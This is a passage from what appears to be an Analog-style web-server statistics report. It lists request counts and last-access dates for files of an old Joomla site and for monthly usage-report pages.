20 | 28/Sep/25 22:31 | /html/libraries/domit/xml_domit_lite_parser.php | |
20 | 30/Sep/25 11:04 | /usage/October2020/agent_202011.phtml | |
20 | 28/Sep/25 17:51 | /usage/November2021/url_202112.phtml | |
20 | 19/Sep/25 23:23 | /html/administrator/components/com_weblinks/controller.php | |
20 | 29/Sep/25 09:05 | /usage/agent_201609.phtml | |
20 | 0.01% | 27/Sep/25 11:59 | /usage/site_201912.phtml |
20 | 30/Sep/25 21:24 | /html/components/com_content/views/section/view.html.php | |
20 | 30/Sep/25 23:22 | /html/plugins/editors/tinymce/jscripts/tiny_mce/plugins/style/props.htm | |
20 | 28/Sep/25 03:16 | /usage/June2016/ref_201606.phtml | |
20 | 0.01% | 30/Sep/25 14:55 | /usage/site_201607.phtml |
20 | 1/Oct/25 01:53 | /html/components/com_weblinks/views/weblink/tmpl/form.php | |
20 | 28/Sep/25 20:06 | /html/libraries/joomla/environment/browser.php | |
20 | 30/Sep/25 17:45 | /html/components/com_user/models/user.php | |
20 | 27/Sep/25 01:14 | /usage/agent_202206.phtml | |
20 | 0.01% | 30/Sep/25 08:37 | /usage/usage_202209.phtml |
20 | 30/Sep/25 20:59 | /html/administrator/components/com_newsfeeds/tables/ | |
20 | 30/Sep/25 17:46 | /html/templates/ja_purity/styles/ | |
20 | 30/Sep/25 22:27 | /html/administrator/components/com_media/views/medialist/tmpl/ | |
20 | 0.01% | 30/Sep/25 13:37 | /usage/usage_201410.phtml |
20 | 30/Sep/25 21:21 | /html/administrator/components/com_media/views/imageslist/ | |
20 | 27/Sep/25 14:31 | /ammundsen/usage/March2020/agent_202003.phtml | |
20 | 20/Sep/25 15:51 | /html/administrator/components/com_admin/admin.admin.html.php | |
20 | 29/Sep/25 01:11 | /html/libraries/pattemplate/patTemplate/Dump/ | |
20 | 29/Sep/25 01:11 | /html/libraries/joomla/template/tmpl/ | |
20 | 27/Sep/25 01:12 | /html/administrator/components/com_content/helper/content.php | |
20 | 30/Sep/25 09:49 | /usage/url_202207.phtml | |
20 | 30/Sep/25 08:15 | /usage/May2014/site_201406.phtml | |
20 | 30/Sep/25 20:37 | /html/libraries/joomla/template/tmpl/help.html | |
20 | 28/Sep/25 21:35 | /ammundsen/usage/July2020/site_202007.phtml | |
20 | 20/Sep/25 09:28 | /html/plugins/search/categories.php | |
20 | 27/Sep/25 12:28 | /html/modules/mod_feed/mod_feed.php | |
20 | 30/Sep/25 13:20 | /visitors/visitors.1 | |
20 | 0.01% | 30/Sep/25 15:59 | /usage/site_201610.phtml |
20 | 0.01% | 30/Sep/25 07:21 | /usage/site_201804.phtml |
20 | 29/Sep/25 18:03 | /usage/url_201310.phtml | |
20 | 0.01% | 28/Sep/25 13:56 | /usage/Septmeber2020/site_202009.phtml |
20 | 30/Sep/25 21:02 | /html/administrator/components/com_media/views/media/ | |
20 | 29/Sep/25 17:25 | /usage/September2012/ref_201209.phtml | |
20 | 21/Sep/25 09:54 | /html/administrator/components/com_categories/toolbar.categories.php | |
20 | 27/Sep/25 04:46 | /html/plugins/authentication/gmail.php | |
20 | 30/Sep/25 20:30 | /html/administrator/components/com_banners/views/ | |
20 | 30/Sep/25 07:59 | /html/libraries/joomla/document/feed/feed.php | |
20 | 24/Sep/25 23:33 | /usage/agent_202305.phtml | |
20 | 28/Sep/25 01:44 | /ammundsen/usage/agent_201801.phtml | |
20 | 19/Sep/25 12:39 | /html/administrator/components/com_content/models/element.php | |
20 | 30/Sep/25 20:11 | /usage/November2021/site_202112.phtml | |
20 | 30/Sep/25 17:58 | /html/instllation.old/template/tmpl/ | |
20 | 25/Sep/25 10:38 | /html/components/com_content/models/article.php | |
20 | 28/Sep/25 23:53 | /usage/July2021/url_202107.phtml | |
20 | 30/Sep/25 16:32 | /html/components/com_newsfeeds/views/category/tmpl/default.php | |
20 | 30/Sep/25 20:30 | /html/administrator/components/com_installer/views/ | |
20 | 0.01% | 29/Sep/25 23:06 | /usage/usage_201411.phtml |
20 | 18/Sep/25 18:00 | /analog/images/barb1.png | |
20 | 29/Sep/25 15:47 | /ammundsen/usage/site_201809.phtml | |
20 | 30/Sep/25 08:31 | /html/administrator/components/com_cpanel/toolbar.cpanel.php | |
20 | 30/Sep/25 19:51 | /html/modules/mod_latestnews/tmpl/ | |
20 | 30/Sep/25 17:15 | /html/libraries/joomla/document/html/ | |
20 | 30/Sep/25 19:02 | /bonvital.txt | |
20 | 30/Sep/25 18:21 | /html/libraries/joomla/html/parameter/ | |
20 | 30/Sep/25 20:01 | /usage/February2021/agent_202102.phtml | |
20 | 26/Sep/25 19:46 | /usage/January2022/site_202202.phtml | |
20 | 30/Sep/25 15:34 | /html/libraries/pattemplate/ | |
20 | 30/Sep/25 20:27 | /html/administrator/components/com_contact/elements/ | |
20 | 27/Sep/25 22:07 | /usage/January2015/agent_201501.phtml | |
20 | 30/Sep/25 22:54 | /html/plugins/editors/tinymce/jscripts/tiny_mce/blank.htm | |
20 | 30/Sep/25 18:16 | /html/administrator/components/com_media/models/ | |
20 | 29/Sep/25 18:47 | /html/components/com_poll/ | |
20 | 28/Sep/25 10:31 | /usage/May2021/url_202105.phtml | |
20 | 21/Sep/25 02:33 | /html/administrator/components/com_contact/tables/contact.php | |
20 | 19/Sep/25 21:26 | /html/administrator/components/com_media/models/manager.php | |
20 | 26/Sep/25 19:23 | /html/plugins/system/legacy/ | |
20 | 27/Sep/25 21:25 | /html/plugins/editors/tinymce/jscripts/tiny_mce/plugins/media/ | |
20 | 30/Sep/25 17:49 | /html/libraries/joomla/database/table/ | |
20 | 0.02% | 30/Sep/25 20:14 | /usage/October2023/site_202310.phtml |
20 | 27/Sep/25 12:28 | /html/plugins/editors/tinymce/jscripts/tiny_mce/plugins/_template/ | |
20 | 0.01% | 30/Sep/25 04:12 | /usage/site_201306.phtml |
20 | 30/Sep/25 16:55 | /analog/lang/deadom.tab | |
20 | 30/Sep/25 17:15 | /html/libraries/joomla/import.php | |
20 | 29/Sep/25 17:11 | /html/plugins/editors-xtd/image.php | |
20 | 0.01% | 29/Sep/25 22:19 | /usage/Septmeber2020/usage_202009.phtml |
20 | 30/Sep/25 18:27 | /html/instllation.old/language/ro-RO/ | |
20 | 30/Sep/25 21:17 | /usage/September2022/url_202209.phtml | |
20 | 27/Sep/25 13:22 | /usage/url_202405.phtml | |
20 | 30/Sep/25 02:48 | /html/administrator/components/com_search/helpers/ | |
20 | 30/Sep/25 18:19 | /html/templates/beez/html/com_contact/ | |
20 | 30/Sep/25 11:55 | /next.txt | |
20 | 26/Sep/25 20:49 | /html/libraries/pattemplate/patTemplate/Reader.php | |
20 | 28/Sep/25 18:00 | /usage/url_202307.phtml | |
20 | 30/Sep/25 15:26 | /html/plugins/editors/none.php | |
20 | 30/Sep/25 10:19 | /usage/url_201702.phtml | |
20 | 20/Sep/25 00:13 | /html/libraries/joomla/cache/storage/file.php | |
20 | 29/Sep/25 03:15 | /usage/May2021/agent_202105.phtml | |
20 | 26/Sep/25 23:12 | /html/libraries/joomla/template/module/function/Sef.php | |
20 | 29/Sep/25 23:27 | /usage/January2015/ref_201501.phtml | |
20 | 27/Sep/25 05:45 | /html/libraries/joomla/document/document.php | |
20 | 30/Sep/25 17:40 | /html/administrator/components/com_contact/ | |
20 | 1/Oct/25 02:10 | /html/libraries/joomla/document/html/renderer/modules.php | |
20 | 28/Sep/25 06:32 | /usage/April2014/agent_201404.phtml | |
20 | 30/Sep/25 20:26 | /html/administrator/modules/mod_feed/tmpl/ | |
20 | 27/Sep/25 14:18 | /html/modules/mod_newsflash/tmpl/_item.php | |
20 | 0.01% | 29/Sep/25 21:16 | /usage/usage_202312.phtml |
20 | 30/Sep/25 20:35 | /html/templates/ja_purity/html/mod_login/ | |
20 | 26/Sep/25 15:10 | /usage/August2021/usage_202108.phtml | |
20 | 30/Sep/25 23:27 | /html/plugins/editors/tinymce/jscripts/tiny_mce/plugins/advhr/langs/ | |
20 | 30/Sep/25 20:24 | /analog/src/bzip2/bzlib.c | |
20 | 30/Sep/25 20:36 | /html/modules/mod_random_image/tmpl/ | |
20 | 28/Sep/25 10:50 | /usage/url_202310.phtml | |
20 | 30/Sep/25 22:10 | /html/administrator/components/com_users/views/users/view.html.php | |
20 | 21/Sep/25 12:26 | /html/plugins/content/pagenavigation.php | |
20 | 27/Sep/25 12:31 | /html/administrator/components/com_search/views/search/ | |
20 | 30/Sep/25 23:42 | /html/plugins/editors/tinymce/jscripts/tiny_mce/plugins/directionality/langs/ | |
20 | 1/Oct/25 01:20 | /html/components/com_wrapper/views/ | |
20 | 30/Sep/25 19:39 | /html/components/com_poll/views/poll/ | |
20 | 29/Sep/25 00:58 | /html/libraries/phputf8/native/core.php | |
20 | 29/Sep/25 16:40 | /html/administrator/components/com_media/views/media/tmpl/default_folders.php | |
20 | 27/Sep/25 23:24 | /usage/agent_201809.phtml | |
20 | 30/Sep/25 23:24 | /html/plugins/editors/tinymce/jscripts/tiny_mce/plugins/table/cell.htm | |
20 | 27/Sep/25 14:41 | /usage/url_201411.phtml | |
20 | 23/Sep/25 23:33 | /html/administrator/components/com_banners/tables/bannerclient.php | |
20 | 30/Sep/25 14:53 | /html/includes/phpmailer/ | |
20 | 28/Sep/25 09:02 | /usage/agent_202504.phtml | |
20 | 30/Sep/25 16:32 | /html/libraries/joomla/error/ | |
20 | 24/Sep/25 21:35 | /html/administrator/components/com_media/views/medialist/tmpl/default.php | |
20 | 0.01% | 30/Sep/25 13:42 | /usage/usage_202008.phtml |
20 | 27/Sep/25 04:26 | /usage/usage_202409.phtml | |
20 | 0.01% | 28/Sep/25 05:00 | /usage/usage_201610.phtml |
20 | 30/Sep/25 13:04 | /visitors/TODO | |
20 | 22/Sep/25 06:52 | /usage/January2021/usage_202102.phtml | |
20 | 28/Sep/25 20:09 | /html/administrator/components/com_poll/views/poll/view.html.php | |
20 | 30/Sep/25 22:24 | /html/administrator/language/en-GB/en-GB.mod_status.ini | |
20 | 29/Sep/25 23:20 | /html/administrator/components/com_menus/assets/images/ | |
20 | 30/Sep/25 18:13 | /html/administrator/templates/system/component.php | |
20 | 0.01% | 27/Sep/25 14:05 | /usage/April2020/usage_202004.phtml |
20 | 30/Sep/25 15:27 | /html/components/com_search/models/ | |
20 | 27/Sep/25 11:57 | /usage/agent_201204.phtml | |
46945 | 3.03% | 1/Oct/25 02:18 | [not listed: 6,682 files] |